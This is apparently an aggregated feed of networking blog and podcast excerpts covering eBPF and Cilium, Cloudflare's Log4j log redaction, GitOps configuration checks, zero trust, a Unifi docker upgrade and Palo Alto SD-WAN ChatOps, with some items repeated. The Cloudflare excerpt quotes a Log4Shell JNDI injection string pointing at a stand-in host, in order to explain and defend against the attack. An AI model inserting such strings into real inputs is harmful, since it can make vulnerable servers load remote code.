Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium
eBPF has taken the Linux networking world by storm. But what is it, exactly? And how it is related to the open-source Cilium project? Duffie Cooley joins Scott Lowe on the Full Stack Journey podcast to discuss eBPF and Cilium. If you're into Linux, networking, or Kubernetes---or any combination of these---this episode is for you!
The post Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium appeared first on Packet Pushers.
Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium
eBPF has taken the Linux networking world by storm. But what is it, exactly? And how it is related to the open-source Cilium project? Duffie Cooley joins Scott Lowe on the Full Stack Journey podcast to discuss eBPF and Cilium. If you're into Linux, networking, or Kubernetes---or any combination of these---this episode is for you!
Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability
On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility. Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.
However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.
Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.
How the attack works
You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.
Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote Continue reading
Checking Network Device Configurations in a GitOps CI Pipeline
Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.
When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:
Checking Network Device Configurations in a GitOps CI Pipeline
Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.
When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:
Is Zero Trust Really Popular With Corporate Customers as Security Experts Say?
Today's most pressing challenge is to communicate to customers that Zero Trust is about much more than just network access and enhanced validation of access legitimacy.Unifi docker upgrade
This post is mostly a note to self for when I need to upgrade next time.
Because of the recent bug in log4j, which also affected the Unifi controller, I decided to finally upgrade the controller software.
Some background: There a few different ways to run the controller. You can use “the cloud”, run it yourself on some PC or raspberry pi, or you can buy their appliance.
I run it myself, because I already have a raspberry pi 4 running, which is cheaper than the appliance, and gives me control of my data and works during an ISP outage.
I thought it’d be a good opportunity to play with docker, too.
How to upgrade
Turns out I’d saved the command I used to create the original docker image. Good thing too, because it seems that upgrading is basically delete the old, install the new.
- Take a backup from the UI.
- Stop the old instance (
docker stop <old-name-here>). - Take a backup of the state directory.
- Make sure the old instance doesn’t restart
(
docker update --restart=no <old-name-here>). - Create a new instance with the same state directory.
- Wait a long time (at least on Raspberry Pi), like Continue reading
Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored)
Today on the Tech Bytes podcast, sponsored by Palo Alto Networks, we discuss a new ChatOps feature in Palo Alto’s Prisma SD-WAN. Engineers and administrators can query the SD-WAN controller from a chat app such as Microsoft Teams and get a meaningful response. Sutapa Bansal, Director of Product Management at Palo Alto Networks, joins us to discuss how it works, use cases, and implementation.
The post Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored) appeared first on Packet Pushers.
Tech Bytes: Bringing ChatOps Into SD-WAN To Simplify Operations (Sponsored)
Today on the Tech Bytes podcast, sponsored by Palo Alto Networks, we discuss a new ChatOps feature in Palo Alto’s Prisma SD-WAN. Engineers and administrators can query the SD-WAN controller from a chat app such as Microsoft Teams and get a meaningful response. Sutapa Bansal, Director of Product Management at Palo Alto Networks, joins us to discuss how it works, use cases, and implementation.HS014 Software Defined Infrastructure – New Build or Not ?
Do you need new hardware to cloud enable your infrastructure ? Should you strategise products on new hardware/greenfield basis or enable your existing brownfield infrastructure ? In this episode we discuss value of enabling existing infrastructure Beware of the vendor goldfield that Greenfield represents Whether supply chain impacts your decisions ? The value of federated […]
The post HS014 Software Defined Infrastructure – New Build or Not ? appeared first on Packet Pushers.
HS014 Software Defined Infrastructure – New Build or Not ?
Do you need new hardware to cloud enable your infrastructure ? Should you strategise products on new hardware/greenfield basis or enable your existing brownfield infrastructure ? In this episode we discuss value of enabling existing infrastructure Beware of the vendor goldfield that Greenfield represents Whether supply chain impacts your decisions ? The value of federated... Read more »